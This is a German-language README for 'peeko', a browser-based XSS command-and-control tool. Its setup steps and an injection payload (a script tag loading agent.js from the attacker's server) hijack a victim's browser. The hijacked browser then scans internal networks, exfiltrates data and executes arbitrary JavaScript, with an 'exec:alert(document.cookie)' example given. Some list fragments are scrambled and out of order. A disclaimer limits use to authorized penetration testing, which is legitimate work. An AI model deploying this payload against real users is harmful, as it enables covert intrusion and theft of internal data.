
peeko – Browser-basiertes XSS-C2 für heimliche Erkundung interner Netzwerke über einen infizierten Browser.
Version: v1.1
peeko ist ein browserbasiertes XSS-gestütztes C2-Tool (Command and Control), das den Browser des Opfers als heimlichen Proxy in internen Netzwerken nutzt.
Über eine injizierte XSS-Payload stellt peeko eine WebSocket-Verbindung zu einem zentralen Server her, wodurch ein Angreifer den Browser des Opfers fernsteuern kann, um Anfragen an interne Dienste zu senden, Netzwerke zu scannen, Daten zu exfiltrieren oder sogar beliebiges JavaScript auszuführen – ganz ohne eine einzige Binärdatei abzulegen.
.txt oder .jsonRepository klonen:
git clone https://github.com/b3rito/peeko.git
cd peeko
Abhängigkeiten installieren:
make install
(Optional) Skripte ausführbar machen:
chmod +x gen-cert.sh start.sh
Selbstsigniertes TLS-Zertifikat erzeugen:
make cert
Den Platzhalter SERVER-IP ersetzen:
Die folgenden Dateien öffnen und bearbeiten:
static/agent.jsstatic/control.htmlSERVER-IP durch die IP/den Domainnamen deines Servers ersetzen:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
Server starten:
make run
Das Bedienfeld im Browser öffnen:
192.168.1.0/24, 10.0.0.10-20 usw.80, 443,8000-8080)exec:... zum Senden verwendenexec:alert(document.cookie);.txt oder .json kopieren oder exportierenModerne Browserrichtlinien beeinflussen, worauf peeko zugreifen kann.
| Header | Inhalt lesbar? | Hinweise |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | Voller Zugriff auf die Antwort |
| Kein Header | ⚠️ | Antwort ist undurchsichtig |
Das Opfer verbindet sich über HTTPS. Wenn ein gescanntes Ziel nur HTTP verwendet:
http://-Endpunkten lesenWenn du während eines Penetrationstests einen internen Dienst findest, der mit Access-Control-Allow-Origin: * antwortet und über HTTPS ausgeliefert wird, wird peeko zu einem heimlichen Proxy, der interne Daten direkt aus dem Browser des Opfers exfiltrieren kann – ohne Dateien abzulegen oder ausgehende Verbindungen zu öffnen.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.
Jede Verwendung von peeko außerhalb von Umgebungen, in denen du ausdrückliche Genehmigung hast, ist strikt untersagt.
Du bist für deine eigenen Handlungen verantwortlich.
Geschrieben von b3rito bei mes3hacklab & GioPpeTto
https://192.168.30.136:8443/static/control.html
Den Agenten injizieren (Beispiel-XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| Eingeschränkte Origin | ❌ | Blockiert oder nicht lesbar |